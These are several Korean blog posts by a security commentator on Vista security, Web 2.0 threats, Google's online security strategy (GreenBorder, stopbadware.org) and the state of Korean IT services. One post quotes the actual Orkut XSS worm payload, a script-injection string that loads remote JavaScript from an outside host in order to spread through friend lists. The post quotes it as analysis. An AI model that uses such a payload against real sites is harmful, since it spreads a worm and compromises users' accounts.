빌의 자신감은 충분히 이해합니다. 그러나 운영체제와 Application은 다르다고 생각합니다. 운영체제에서 모든 Secure한 구조 위에서 Application을 운영하고 통제를 한다면 이것은 진정한 All in One 이자 MS Emperor라 부를 수 있을 것입니다. 하지만 완전한 것은 없습니다. 운영체제의 보안이 하나 흔들리게 되면 모든 Application도 흔들리게 됩니다. Application 접근을 위해 통제가 가능한 PatchGuard 라는 방안도 만들어 두고 있으나 장기적 관점에서는 MS의 의도는 중대한 실책에 부딪힐 수 있을 것입니다. 자사가 만든 모든 Application의 변환은 그리 원활하지 않을 것이고 지금까지 투입된 것 보다 휠씬 더 많은 가치를 투입하고 긴 시간이 소요 될 것입니다. 이 간극의 시간에 많은 문제들이 발생 할 것이고 또한 Vista Protection도 깨질 것으로 보입니다. 확실 하다고 할 수 있습니다.

 

SAAS & SAAP의 충돌 ( 구글과 MS ? )

 

SaaS ( Software as a Service ) Saap (Software as a Product) 의 충돌이 이제 곧 예상이 됩니다. 올해부터 시작이 될 것으로 보입니다. SaaS의 선두 주자는 구글이고 Saap MS가 되겠죠. SaaS는 근래에 회자 되고 있는 용어이나 Saap는 방금 제가 급조한 용어입니다. ^^ ; Product 관점에서 접근하는 MS Service관점에서 접근하는 구글을 가르는 키워드는 Security 입니다. 두 패러다임을 이끌고 있는 기업 모두 직면한 과제라고 할 수 있습니다. Product 관점의 MS OS에 모든 것을 포함하려는 첫 시도가 Vista이고 많은 노력을 기울였지만 전체적인 관점에서 Trustworthy Computing Initiative는 아직 갈 길이 멀다고 봅니다.

 

빌이 역설한 Vista의 보안성 강조 부분에서 읽어 낼 수 있는 부분을 최대한 읽어 보았고 향후 양대 세력의 움직임을 어설프나마 예측해 보았습니다. 또 빌의 호언장담은 그리 만만치 않은 현실 속에서 많은 어려움을 겪게 될 것입니다. 아쉽게도 큰 흐름을 주도하는 두 세력 모두가 미국 회사라는 점이죠. 이런 거대 경쟁 속에서 발전을 하고 새로운 흐름을 주도하는 것이 부러울 따름입니다. 우리도 끊임없이 노력하다 보면 언젠가는 새로운 흐름을 선도 할 수 있을 것입니다. 지금은 틈을 노려야 할 때..

 

- 바다란 세상 가장 낮은 곳의 또 다른 이름. P4ssion

 

* 빌게이츠가 제 친구는 아닙니다. ^^; 서양 스타일 대로 호칭한 것이니 별다른 오해 없으셨으면 합니다. ^^;


 

 

 

 
Posted by 바다란

바다란입니다.

 

지난해 초에 Web 2.0의 위협요소와 관련하여 여러 곳에서 발표를 한 내용이 있습니다. 그 PPT의 마지막장에 앞으로 다가올 위험요소들은 무엇이 있을까?에 대한 예상을 게재한 바 있습니다.

그 예상은 다음과 같습니다.

 

 

2007년 2월에 작성한 예상은 지금도 유효하며 향후에도 3~5년 가까이 유효한 예상입니다. 2006년 하반기에도 비슷한 이슈들이 있었으나 분석가들 대부분은 개별 기업의 문제로 치부하고 단편적인 이슈로 취급을 하였습니다. 세계적인 경우에도 비슷합니다. 국내의 경우에는 당연히 기사를 받아다 쓰는 경우 외에는 없었죠.

 

이 예상의 근거는 무엇인가 하면 취약성의 발견과 공격 기법의 변화, 파급효과에 따른 기대치에 따라서 예상이 되었습니다. 보다 많은 대상자에게 공격을 하는 패러다임의 전환기에서 일반 사용자 PC를 공격하기 위한 다양한 Bot 들이 출현 하였다면 이제는 보다 더 대상을 명확하게 규정하고 확실한 효과를 보기 위해서 Web Application worm을 이용한다는 변화가 심각하게 눈에 들어 왔기 때문입니다.

 

앞으로의 예상도 유사합니다.

보다 많은 대상자에게.. 보다 많은 유효한 대상에게 전파를 하고 확실한 효과를 얻기 위한 공격 기법은 계속 될 것이고 이 공격은 Cyber Black market이 존재하는한 ( 향후 몇 십년간 근절될 가능성은 없습니다. 인간의 기본적인 속성상..) 계속 될 수 밖에 없습니다.

 

Web을 통한 악성코드의 유포의 경우에도 일반적으로 국내와 최근의 해외의 경우에는 특정 게임의 계정을 탈취하기 위한 공격들이 많았습니다. 특정 게임의 유저들이 자주 방문하는 사이트를 공격하는 경우가 일반적이였으며 이제는 전체의 대상자를 겨냥한 사이트 공격이 일반화 되어 있습니다. 

 

악성코드의 두 가지 흐름은 Application Attack 관점에서 두 가지 방향으로 볼 수 있습니다. 하나는 위에 언급한 악성코드 유포를 위한 관련성 있는 Web site에 대한 직접적인 공격 ( Application의 Perimeter validation error 부분을 공격 - ex : sql injection, Cross Site Scripting)을 통한 방문자 PC 악성코드 전파 사례와 또 다른 하나는 직접적인 Service 구조를 공격하는 Application Attack이 있을 수 있습니다.

 

첫번째 케이스는 이미 이 블로그에서도 상당부분 지적한 바 있으며 Service에 특화된 공격들도 예를 든 적이 있습니다. Yahoo Messenger에 대한 공격, Myspace에 대한 악성코드 Attack들이 있으며 지난해 12월에 발생된 Google의 orkut ( SNS) 사이트에 대한 공격이 특별한 예가 될 수 있습니다.

 

Orkut에 대한 공격은 하기의 링크를 참조 하시면 일정 수준의 정보를 얻을 수 있습니다.

 

http://www.news.com/8301-10784_3-9836029-7.html?tag=nefd.only

http://www.cgisecurity.com/2007/12/17

 

source code & analysis

 

http://www.marrowbones.com/commons/technosocial/2007/12/orkut_worm_code_and_why_was_go.html
http://ha.ckers.org/blog/20071220/orkut-xss-worm/

 

위와 같이 정보의 확인이 가능합니다. 위의 기사에서 언급 되었듯이 40만명 가까운 유저에게 짧은 시간동안에 Worm이 퍼지는 것을 확인 할 수 있습니다. 관계로 이루어 지는 모든 SNS 사이트들은 동일한 구조를 지닐 수 밖에 없으며 문제를 가지고 있습니다. 이제는 Web을 통한 연결이 일반화 되고 다양한 연결 도구들을 활용 하여 ( AJAX, RSS , ATOM ...) 연결이 이루어짐으로 인해 피해는 특정 서비스에 한정된 모든 사용자들에게 전파가 됩니다.

 

orkut worm에서의 중요 코드는 다음과 같습니다.

"[/silver]<br/><embed src=\"http://www.orkut.com/LoL.aspx\" type=\"application/x-shockwave-flash\" wmode=\"transparent'); script=document.createElement('script');script.src='http://files.myopera.com/virusdoorkut/files/virus.js';document.getElementsByTagName('head')[0].appendChild(script);escape('\"width=\"1\" height=\"1\"></embed>";

 

위의 코드에서 중요한 부분은 사이트 실행시에 전달되는 인자 값에 script가 실행되는 문제가 모든 문제의 시작이라 할 수 있습니다. 전달 되는 인자값에 스크립트가 실행됨으로 인해 스크립트 내의 소스코드들은 orkut의 Friend list를 가져오고 전파하는 유형의 코드들을 볼 수 가 있습니다.  ( 상세 내용은 위에 언급한 URL 내의 소스코드를 일부 분석해 보시면 연관관계 파악이 가능합니다.)

 

지난해 초에 제시한 Next Threat의 특징들에 제시된 내용과 동일함을 볼 수 있습니다.

 

Application Web service worm 이며 특정 서비스에만 국한된 국지적인 영향 ( Google의 orkut) , Ubiquitous Attack ( 유,무선 사용자들에게 동일한 영향을 미침), 더불어 플랫폼에도 국한되지 않는 공격입니다.

대안으로는 여러번 언급 하였으나 모든 Application에 대한 사용자 접근 지점에 대한 Validation check의 일반화 , 사고 발생 이후의 빠르고 역동적인 대응만이 해결책입니다. 이 부분을 처리 하기 위해서는 수준높은 전문가의 활용과 서비스에 익숙한 보안 전문가들의 확보가 필수적입니다. 세계적인 기업들에 Application security 전문가들의 자리는 앞으로도 많이 비어 있을 수 밖에 없습니다. 그만큼 기회도 많고 Risk도 높다는 이야기 입니다. 국내라고 예외 이겠습니까?...

 

많은 IT 서비스 기업들이 보다 더 사용자 접근성을 강화하고 활발하게 하도록 구성이 되고 있는 지금 시점에 해외보다 더 많은 위험들이 존재한다고 볼 수 있습니다. 단지 공격에 대한 기대 효과가 있느냐 하는 가치의 문제 때문에 시도가 되지 않는 것이죠. 일부 대규모 IT 서비스 업체에서는 알게 모르게 Service에 특화된 Attack들이 다수 있었을 것입니다. ( 부정 할 수 있는 서비스 업체가 어디 일까요? )

 

왜 이런 유형들이 발생되고 있고 향후에는 어떻게 될 것인지에 대해서 인지하는 것은 중요합니다. 그러나 그 어느 누구도 중요성을 언급하지 않습니다. 05년 부터 중국발 해킹의 위험성과 파괴력에 대해서 언급 하였으나 세계적인 흐름은 07년에 들어서야 가까스로 피해를 입고 인지하는 수준으로 전달이 되고 있습니다. 그만큼 국내의 환경은 빠르고도 역동적인 기회를 부여합니다. ( 보안전문가들에게..) 더불어 그만큼 가혹한 노력을 요구하는 환경입니다.

 

앞으로의 방향성에 대해서 고민하지 않는 전문가. 생각조차 하지 않는 전문가들은 가치가 없습니다.

치열하게 고민해야 됩니다.

 

 

특화된 Service Attack은 계속 발전할 것이고 사용자 연결 지점의 사소한 문제들도 이제는 전체의 서비스에 영향을 미치는 거대 사안이 될 수 있습니다. 그만큼 중요도가 높아 진다는 것이죠.

변화를 따라 갈 것이냐 리딩 할 것이냐는 마음먹기에 따라 달린 것입니다.

 

올해도 또 이렇게 시작합니다.  앞으로도 많은 관심과 질책을 아낌 없이 주셨으면 합니다. 지난 한해 감사했습니다.

 

- p4ssion is never fade away . 바다란

 

 

 

 

Posted by 바다란
 

 

이제서야 처음 언급한 전략이 나오네요. 전략이라고 해봐야 별 거 없습니다.

뭐 특별하고 신출귀몰한 것도 없고 어느 정도 수준 되면 다 보이는 정도입니다. 이런 흐름을 얼마나 역동적으로 리딩을 하고 끌고 가느냐가 생존을 담보 하겠죠. 앞으로의 세상은 더더욱 그럴 것 입니다. 안주하는 서비스기업들은 무너지겠죠. 한 순간에 녹아 내리듯이 그렇게..

힘겹고 고통스러운 일이지만 그 동안 외면 했던 Security 라는 측면을 하지 않으면 생존하기 힘든 상황이 될 것입니다. 눈에 보이는 것이 아닌 체질적으로 서비스에 내재된 기술적 보안역량이 서비스의 질에 매우 큰 차이를 가져오게 될 것입니다. 앞으로는 보유 여부에 따라 극복하기 힘든 절대적인 차이가 발생하게 될 것입니다.

 

 

 

보안전문가와 보안 관리자의 차이( http://blog.naver.com/p4ssion/50014996901 ) 에서 언급한 GSM (General security manager ) SSM (Special Security manager) 의 구분과 동일합니다. GSM이 아닌 SSM의 보유여부에 따라 향후의 IT 서비스 기업의 흥망성쇠는 달라집니다. 최소한 글로벌 비즈니스를 하는 곳은 그러 합니다.  단지 인력을 확보 하고만 있는 것이 아닌 역량 발휘가 가능한 환경까지도 조성이 되어야만 하는 문제입니다. 국내의 현실은 SSM보다는 GSM이 더 우대 받는 현실이지만 앞으로의 다가올 위협에 뼈저리게 느낄 기회가 주어지게 될 것입니다. 위협에 대한 대응에 있어서 국내에서는 유야무야 얼버무리는 것이 된다 하여도 해외사업에서는 절대 그렇게 되지 않을 것입니다. 그때 가서야 알게 될 것입니다. 후회해도 늦었지만.. (하고 싶은 말들은 있습니다만. 이런 내용은 사설로 나중에  더 가슴에 맺히면 쓰도록 하겠습니다. 꾸벅)

 

1. Google online security 전략 개요

http://blog.naver.com/p4ssion/50019586109

 

2. online security 전략 상세  - * Trustworthy web

                                    * Google security strategy

3. online security의 방향과 미래 ??

 

* Google의 전략

 

- Direction : Passive protection ->Active protection으로의 전환

 

개념상으로 단순한 바이러스의 제거  ( 발생 이후에 제거가 가능한 부분) 서비스의 제공에서 벗어나 올해부터는 본격적으로 Active한 보호를 가능케 하도록 서비스 틀이 변화 될 것을 예상 할 수 있습니다. 1~2년 후에 일반화된 경향이 될 것으로 예측 됩니다.

Active한 보호 방안이란 사용자의 선택에 따른 AV 서비스의 제공이 아닌 악성코드 감염을 원천 차단하고 악성코드 유포 사이트에 대한 사전대응 형식으로 사용자에게 노출되는 악성코드를 적극적으로 줄이겠다는 의사로 풀이가 됩니다.

 

서비스적인 측면에서 Passive Active Protection 두 방안의 조화로운 운영을 통해 문제 발생 부분을 최소화 할 것으로 보이며 프로세스상으로는 다음과 같은 일련의 체제를 갖출 것 같습니다.

 

Active (예방 ) - Passive (대응) - Response ( 관리)

 

Active :

GreenBorder Product를 통한 악성코드 감염의 원천방지 ( 전체 사용은 어려울 것으로 예상)

일부 구글팩 및 구글툴바를 활용한 사용자 선택적인 사용이 중점이 될 것으로 예상됨

 

Passive:

구글팩에 포함된 Symantec AV 백신을 통한 사용자 치료 서비스의 강화 , 향후 다양한 멀티 벤더 제품을 사용하도록 할 가능성이 있음.

 

Response:

Stopbadware.org 사이트 운영을 통한 악성코드 유포 가능성을 지닌 사이트의 검색 결과 격리

stopbadware.org 사이트에 등록이 되는 사이트들은 AV벤더와 협력하여 탐지가 되는 결과를 가지고 진행합니다. 한국의 경우에는 KISA와의 협력을 통한 악성코드 유포 사이트 정보를 활용하여 stopbadware.org 사이트에 등록을 하게 될 것으로 보입니다.

 

위와 같이 세가지 방향에서의 online security가 이루어 지고 있으며 움직임이 본격화 되었다는 것은 security라는 측면이 online business에서 얼마나 중요한 가치를 지닐 수 있는지를 인지했다고 볼 수 있습니다. 내부 보안 강화 및 서비스의 보안 강화의 측면에서 한층 더 나아가 user 단위에 까지 영향을 미치는 security가 가미된 서비스로 방향을 설정한 것이라 봅니다. 그리고 현재의 위협 상황에서는 사용자까지도 보호를 해야만 서비스의 안정성이 유지가 되는 것이 사실입니다.

 

기본개념으로는 secure search search integrity (security 측면에서의 무결성- 악성코드로부터 Free..)으로 흐름분석이 가능 한데 일련의 이슈들을  서술 하면 다음과 같습니다.

 

 

Secure search & Browsing

 

secure search라는 부분은 제가 해석한 부분입니다. 대표적인 예로 올해 상반기에 인수된 Greenborder를 예로 들 수 있습니다. 전편에서 언급 하였듯이 검색 서비스 자체의 보안 측면은 아닙니다. 검색을 통해 노출된 사이트들을 통해 사용자가 피해를 입는 부분을 최소화 하자는 것이 근본 방향이 될 것으로 보입니다. Google을 통해 검색을 하고 그 결과를 클릭 하였는데 악성코드에 감염이 되었다는 문제 제기를 피하기 위한 방안으로 인식이 됩니다.

이 움직임은 올해 초에 구글의 Anti malware 팀에서 조사한 내용을 통해 근본 근거를 마련하고 이후의 Action item으로 Greenborder의 인수를 추진한 것으로 확인이 됩니다.  조사되고 발표된 내용은 전체 검색 결과의 10%가 악성코드 및 위험요소를 가지고 있는 유형으로 파악되었다는 자체 조사 결과 입니다.

 

Greenborder에 대한 설명은 전편에 설명을 하였지만 부가적으로 더 언급을 하면 Secure Browsing을 구글 내에서는 가능하게 하겠다는 근본취지를 지니고 있는 개념으로 볼 수 있습니다.  구글을 통해 검색이된 결과는 사용자가 클릭을 하여 해당 사이트로 이동을 하여도 악성코드에 감염되지 않는 Frame을 만들겠다는 관점에서 볼 수 있습니다.

 

대부분의 웹사이트를 방문할 경우 해당 사이트의 컨텐츠들은 사용자 PC의 임시파일 저장소에 저장이 되어 (cache ) 사용자의 브라우저 화면에 보여지게 됩니다. 대부분의 악성코드들이 감염 시키는 방식이 다운로드 이후 실행을 하는 방식을 취하고 있는데 GreenBorder의 경우에는 이 공간을 격리 시킵니다.

격리라는 의미는 별개의 가상공간에서 다운로드를 받고 사용자의 Browser에 보여지게 한 뒤에 사용자가 해당 사이트 이탈 시에는 가상공간을 없애는 유형으로 악성코드가 사용자 PC에 직접 침입 하는 유형을 원천 차단하는 것을 의미합니다.

 

개념 상으로는 좋은 방향이지만 국내의 현실에서는 문제가 많을 것으로 보이며 문제는 다수 발생 할 것으로 보입니다.

ActiveX 또는 부가 설치가 필요한 모든 부분에 대해 예외 설정 등을 하게 되면 문제는 계속 될 것으로 보이며 향후 구글 툴바 혹은 구글팩에 포함되어 사용자의 선택에 의해 사용하게 되는 유형으로 서비스 될 것으로 예상됩니다.

 

7.11일 현재 구글은 postini 라는 이메일 보안 업체를 6000억원을 주고 인수 합병을 하기로 한 기사가 나왔습니다. 관련 업체의 프로필을 살펴본 결과 기업용 제품으로서 단순한 이메일 보안업체가 아닌 일관된 Policy의 적용 및 내부 정보 유출을 방지하는 서비스 유형으로 파악이 되며 Google의 서비스 측면에서 보았을때 향후 기업용 시장에 대한 진출 도구로서 활용이 되고 Gmail에 대한 서비스 강화, 이익 강화 ( 미국의 3대 이메일 보안 서비스 업체라고 함) 측면에서 보는 것이 바람직해 보입니다.

 

 

Search integrity

 

검색결과에 대한 무결성을 보장한다는 의미는 검색 관련된 서비스를 하는 업체에게는 매우 중요한 factor 입니다. 그동안의 무결성이 검색 결과에 대한 정확도의 측면에서 접근 하였다면 지금은 전체적인 Web상의 위험요소 발달에 따라 다른 부분으로 전이가 되고 있습니다.

 

검색결과에 대한 정확도 측면 + 검색결과에 대한 신뢰도 ( 신뢰도 측면은 사용자 PC에 대한 안정성 측면의 신뢰도 입니다.) 가 이제는 기본적인 흐름으로 대두 될 것입니다. 이런 연유에 따라 구글의 Anti malware 팀에서는 구글 검색 결과 중 10%가 악성코드 유포의 위험성이 있다고 스스로 발표를 한 것으로 볼 수 있습니다. 스스로가 발표를 하면서 위험성이 있다는 것도 사용자들에게 알리고 이런 위험성을 제거하기 위해 사용자의 Action을 제한 할 수 있는 서비스를 출시 하는 것으로 볼 수 있습니다.

 

사용자의 Action 제한을 하더라도 큰 범주에서는 사용자의 보호를 위한다는 당위성 확보로 적절하게 활용이 된 것을 볼 수 있습니다.  구글 서비스에서 이루어지는 빠른 변화에 대한 사전작업이라고 보입니다.

 

Search integrity를 확보하기 위해서는 무엇을 하는가? 하는 측면에서 바라보면 드러난 부분으로는 다음과 같습니다.

Stopbadware.org 사이트의 활용 - 하버드 법대에서 운영을 하도록 합니다.  AV 벤더 및 악성코드 유포를 탐지하는 여러 업체 및 기관과 협력하여 거의 실시간에 가깝게 악성코드가 유포되고 있는 사이트 정보를 획득하고 해당 사이트 정보를 구글의 검색 결과에 반영을 합니다. Black list에 등재된 사이트의 경우 검색 결과에 노출이 되어도 사용자가 클릭을 하면 악성코드 유포 위험성 안내와 함께 stopbadware.org 사이트로 이동을 하도록 하고 있습니다.  관련 업체에서 이의제기를 하고 싶어도 구글 에게 직접 하는 것이 아닌 하버드법대에 이의제기를 해야죠.  blacklist에서 제거 되는 부분도 악성코드 유포 위험요소를 제거한 이후에 되도록 되어 있고 black list에서 제거되면 검색결과는 정상적으로 해당 사이트 링크를 활성화 시켜 줍니다.

 

주변 환경을 이용하는 측면에서 영악하다고도 볼 수 있는데 구글의 정보통제 및 독점에 대한 문제 회피를 위해 하버드 법대를 활용한 개념이 있고 또한 거의 실시간에 가까운 전 세계 협력 기관 및 AV 벤더의 자료를 취합해 적용함으로써 신뢰도를 높이는 점이 있을 것 같습니다. 자료를 제공해주는 기관이나 벤더는 향후 대폭 확대될 가능성이 있을 것이며 확대에 따라 신뢰도는 더 높아지는 결과를 유발 할 것입니다. 2007.7.11자로 확인을 해보니 악성코드 유포 가능성이 있고 유포중인 사이트가 197000여 개 정도 리스트업이 되어 있습니다.  

( http:://www.stopbadware.org )

우리나라의 경우에는 KISA에서 제공되는 악성코드 유포 사이트 정보를 활용하여 보다 전문적이고 지역적으로 특화된 내용에 대해서도 대응이 가능한 체제를 수립하려는 것으로 보입니다.

 

Response 영역에 대해서는 특별히 언급할 내용이 없으며 구글팩의 설치부터 AV 백신의 실행까지 모두 사용자 동의 하에 가능한 부분이라 영향은 제한적이지만 향후에는 위협의 증가에 따라 기본으로 제공될 가능성이 존재합니다.

 

 

Integrity Secure search & browsing에 대한 간략한 개념을 설명 드렸습니다.

 

영향은 어떻게 될까요? 짧은 소견이지만 생각 나는 대로 정리 하겠습니다.

 

Google의 검색 안정성 강화 ( 이익 창출을 위한 필수도구로서의 security factor 인식의 산물)

Active , Passive , Response process를 통한 전방위적인 대응체제 수립이 가능할 것으로 보이고 각각의 영향력이 다름으로 인해 효과는 제한적이나 향후 1~2년 이내에 Frame화 되어 정착될 가능성이 높습니다.

 

Active method (Green border technology)의 활용은 제한적이 될 가능성이 높고 위에 언급 하였듯이 Toolbar 혹은 별도의 Plugin 형식으로 전파가 되고 사용자의 선택에 따라 활용하는 용도로 이용될 가능성 있습니다.  단점으로는 언급 하였듯이 전체적인 보안기술의 적용이 어렵습니다. 특히 국내의 경우에는 많은 사이트들에 장애를 일으키거나 정상적인 접근이 어려워 지는 경우가 발생될 것으로 예상됩니다. 사용자의 설정 요구가 매우 많아져서 오히려 사용자를 떨어지게 할 수도 있을 것 같네요.

 

구글은 사용자의 요구와 Security의 강화라는 측면에서 Web 상에서 노출되는 많은 위험들을 앞으로 적극적으로 강조할 것으로 보입니다. 분명한 사실이지만 비지니스적으로는 강조해야만 불편함에 대한 사용자의 요구를 일소 할 수 있는 명분이 생기는 것이겠죠.  

Passive Response에 해당하는 이슈들은 앞으로 많은 영향을 미칠 것으로 보이며 특히 AV벤더와의 협력관계 확대를 통한 Response 영역의 확장은 노하우가 쌓일 수록 강한 힘을 발휘 할 것 같습니다.

 

글을 쓰는 목적은 변화하는 흐름을 분석하고 이해해서 향후 방향 설정에 도움이 되었으면 하는 마음에 분석한 것이며 그 과정에서 최근 구글의 행동이 주목할 만 하여 케이스 스터디 차원일 뿐입니다.

 

감사합니다.

 

* 심각하게 고민한 내용이 아니고 그 동안 나온 기사를 바탕으로 생각나는 대로 나열한 부분입니다. 내용 중에 이해가 어려운 부분도 있을 수 있습니다. 이 부분은 설명하는 사람의 무지를 탓하시면 될 것 같습니다. 또한 내용 중에 정확하지 않은 내용도 있을 수 있습니다.  신문기사만 보고 판단한 것이라 다른 내용들이 있을 수 있습니다. 개인적으로 보는 관점이라고 봐주시면 감사하겠습니다.  재주가 없어서 그런지 이해한 내용을 전달 하는 것도 부족한 부분이 많습니다.

 

- 사족 나갑니다.

왜 국내 IT Service 기업들은 변화를 리딩 하지 못할까요?  IT Service에서 안주와 자리 지키기는 죽음에 이르는 길입니다. 죽음의 길에 조금 더 빨리 가도록 하는 것이 학벌과 지연과 인맥에 의한 것이겠죠. 특히 Global Service기업이라면 학벌, 지연, 인맥에 의존 하는 순간 초고속 급행열차로 죽음의 길에 가는 것과 다름 없습니다. 남의 떡이 커 보인다고 키워야 될 자기 것들을 팽개치고 이러다 보면 순식간에 무너지겠죠. 전문직무분야인 보안 분야에서도 그러한데 다른 분야는 오죽하겠습니까? ^^; 위험을 인지 하지도 못한다면 더 심각한 상황이라 할 수 있습니다. 매 순간이 위기인데 말입니다. 백척간두 진일보라는 말은 개인에게만 해당되는 말은 아닙니다. 지금 이 순간의 모든 IT서비스기업들에 해당이 되는 의미입니다. 당장 1년 뒤를 보장할 그 어떠한 것도 없습니다. 세계와의 경쟁에는 학벌과 인맥, 지연이 통하지 않습니다. 그리고 지금의 서비스는 이미 세계와 경쟁 중입니다. 4천만의 시장으로 먹고 살 수 있다고 생각하는 고만고만한 기업이라면 이름 없이 사라짐을 당연하게 알아야 될 것입니다. 아쉽게도 문제는 그런 기업들이 너무 많다는 것이 문제일 뿐입니다. 아쉽지만 여기까지 인 것 같습니다.


 
Posted by 바다란
 

 

바다란 입니다.

 

현재의 인터넷 환경을 주도하고 있는 화두업체인 구글에 있어서 Online security는 어떤 의미인지 이 시점에서 짚어 보는 것이 필요하다고 생각 됩니다.

전체적인 맥락에서 한번 짚어볼 부분은 반드시 있을 것 같아서 이전 Thread에서 약속한 것과 같이 3가지 Article로 정리를 하도록 하겠습니다.

 

1. Google online security 전략 개요

http://blog.naver.com/p4ssion/50019586109

 

2. online security 전략 상세  - * Trustworthy web

                                    * Google online security strategy

3. online security의 방향과 미래

 

오늘은 2번 항목을 정리해 보도록 하겠습니다. 지난 issue 부분에서 논의된 내용을 체계적으로 구성을 하여 향후 방향에 대한 예측 부분으로 정리를 하겠습니다. 3번 항목은 미정입니다.

 

Google Online security 전략은 사실 오래 되지 않은 부분입니다. 그 동안은 자사의 서비스 시스템에 대한 안정화와 Process 강화와 관련된 부분이 가장 컸을 것으로 예상 하고 있습니다. 실상 여타 포털과 비교해서 Contents 제휴 종류와 범위로 따지면 비교도 되지 않는 (?) 구글입니다. 검색 전문업체로 시작하였기에 일면 국내에서 통용되는 포털이라는 개념과는 조금 다른 관점에 있습니다.  내부에서 개발된 Application에 대한 검증도 실시간으로 세계적인 이슈가 통용 되고 있는 보안 부분에 대해 받는 위험도와 압력은 IT 서비스 업체 모두가 해당이 됩니다.  IT 서비스업체나 Google이나 모든 웹서비스 업체는 보안에 대해 실시간으로 동일한 위험과 동일한 압력을 받고 있다고 할 수 있습니다.

 

왜 이런 위험요소들이 도출이 되고 행동들이 있는지는 전체적인 Attack trend를 살펴야만 가능합니다. 현재의 Trend는 다음과 같이 단편화 시킬 수 있습니다.

 

 

 

2005년부터 나타나기 시작한 Application에 대한 공격은 Web의 일반화와 궤를 같이 하고 있습니다. Web service의 활성화와 일반화에 따라 개발되는 모든 Application들이 Web을 통한 연결을 기본으로 하고 있습니다. 일반 C/S 환경에서 활성화 되는 Application의 수는 대폭 줄어들고 있다고 볼 수 있습니다. 아마도 일부 특수한 환경에서 사용되는 Application을 제외하고는 web 연결이 필수적인 Application이 대부분으로 예상이 됩니다. 

Web Application의 출현과 더불어 공격이 출현하게 되고 이전의 운영체제의 취약성을 노리는 직접 공격에서 운영체제 위에 설치 되고 운영이 되는 Web application에 대한 직접 공격이 증가하게 됩니다. 또한 이런 Application에 대한 공격은 자동화된 경향을 나타내며 발전하고 있습니다.

 

특정 서비스에만 특화된 Application attack의 출현도 일반적인 현상이라 할 수 있습니다.  (관련 내용은 올해 들어 여러 곳에 발표를 한 Web 2.0 관련 위험요소라는 PPT를 적당한 시점에 공개토록 하겠습니다. )

 

Web application에 대한 공격이 증가 한다고 하였습니다. 그럼 이런 공격 유형과 기업들의 변화된 움직임은 왜 일까요?. 그 변화에 대한 답은 제가 생각하기에는 다음과 같은 환경의 변화로 인해 기인 합니다.

 

위의 항목에서 보시면 각각의 서비스 기업들의 변화와 보안상의 위험요소와의 연관 관계를 추산할 수 있습니다. 제가 나누는 관점에서는 Worm의 출현에 따라 기업들의 대응과 보호 방안들이 달라지고 있다고 판단 하고 있습니다.

최초에는 Worm의 출현 -> Worm의 일반화 -> Web attack의 출현 -> Web을 통한 무차별적인 악성코드의 유포와 개인정보 도용 이런 유형으로 나눌 수 있으며 그에 따른 기업들의 대책들이 달라지고 있다고 볼 수 있습니다.

 

물론 공격유형이 변화는 사회적인 변화와도 궤를 같이 하고 있으며 세계에서 가장 빨리 위협을 경험한 곳이 대한민국이지만 향후에는 좀 더 다른 양상을 보일 수 있습니다. 개인정보를 유출 하기 위한 악성코드의 출현과 무방비로 노출된 사용자의 PC에 대한 문제는 이제는 IT 서비스를 진행하는 업체 모두에게 위험요소가 되고 있습니다.

직접적인 서비스 공격에 대한 대비도 하여야 하며 또한 서비스를 이용하는 사용자들에 대한 보호 대책도 강구 하여야 합니다. 해외는 이제 사용자들에 대한 보호 대책들이 출현하고 있는 시점이라 할 수 있습니다.

 

이른바 주가는 경기에 선행 한다고 합니다. 경기의 활성화를 미리 가늠 할 수 있는 요소가 주가 지수라는 의미인데 다른 비유를 하자면 Internet Industry의 위험요소를 가장 먼저 경험한 곳이 대한민국이고 그 위험요소가 이제 전체로 전이가 되고 있는 것으로 볼 수 있습니다. 해외 유수 IT 서비스 기업들의 움직임이 그러합니다. 적당한 비유가 생각 나지 않아 가져다 붙였습니다. ,

그 위험요소는 Web에 대한 공격이고 이런 공격들은 2005년부터 국내에 본격화 되었으며 악성코드에 대한 피해도 본격화 되었다고 볼 수 있는데 이런 위험에 대한 인식은 해외 업체들의 경우 인식에 대한 시기 자체가 조금 늦게 시작 되었습니다만 보다 더 꾸준하고 큰 영향력을 미치는 방향으로 이루어 진다는 점에 대해 주목하여야 합니다.

 

소통의 도구로 일반화 되고 향후에도 1분 이내에 전 세계와 소통 할 수 있는 Web의 발달은 더욱 가속화 될 것이고 생활과 더 밀접하게 연관이 있게 될 것입니다. 전 세계 어디에서나 글을 올리고 1분 이내에 접근 할 수 있다면 Web을 통한 모든 위험요소들의 전파도 1분 이내에 전 세계에 영향을 미칠 수 있다는 것과 동일합니다.

 

그만큼 Trustworthy web의 구현은 필수적인 요소가 될 것 입니다.

이런 요소의 중요성에 대해 인식하지 못하는 많은 서비스 업체들은 시행 착오 및  곤란을 다수 겪게 될 것이고 도중에 무너지는 경우도 종종 발생하게 될 것입니다.

지금 까지는 아니지만 앞으로 더 심각해 질 것이라는 것입니다.

 

신뢰할 만한 웹을 만들어야 된다는 것은 이제 서비스 업체들의 지상목표가 될 것이고 많은 노력이 필요하게 될 것입니다. 여기 전 세계 유명 기업들의 신뢰할 만한 웹을 위한 노력을 조금 살펴 볼 수 있는 요소가 있습니다.

 

아래의 Article Cnet.com에서 "웹보안의 미래"라는 제목으로 주요 기업을 인터뷰한 기사입니다. 참고 삼아.. – 본 인터뷰 기사를 통해서도 내부 프로세스의 흐름을 일부 예측 하는 것은 가능합니다. 이 내용은 조만간  (언제나 그랬듯이 쓰고자 하는 의지가 생기면 바로 씁니다.)

 

http://www.zdnet.co.kr/news/internet/search/0,39031339,39158840,00.htm  구글의 치열하고 즐거운 보안 노력

http://www.zdnet.co.kr/news/internet/search/0,39031339,39158918,00.htm   야후 보안, '편집증 환자들'

http://www.zdnet.co.kr/news/internet/etc/0,39031281,39159098,00.htm  MS 데스크톱의 경험을 살리다.

 

* 위의 인터뷰를 보시면 아시겠지만 기술적인 보안이 온라인 서비스 기업에 대해 중요한 영향을 미치고 있음을 알 수 있습니다.  MS는 그 관점에서 보면 아직 갈 길이 많이 남았다고 할 수 있습니다.

 

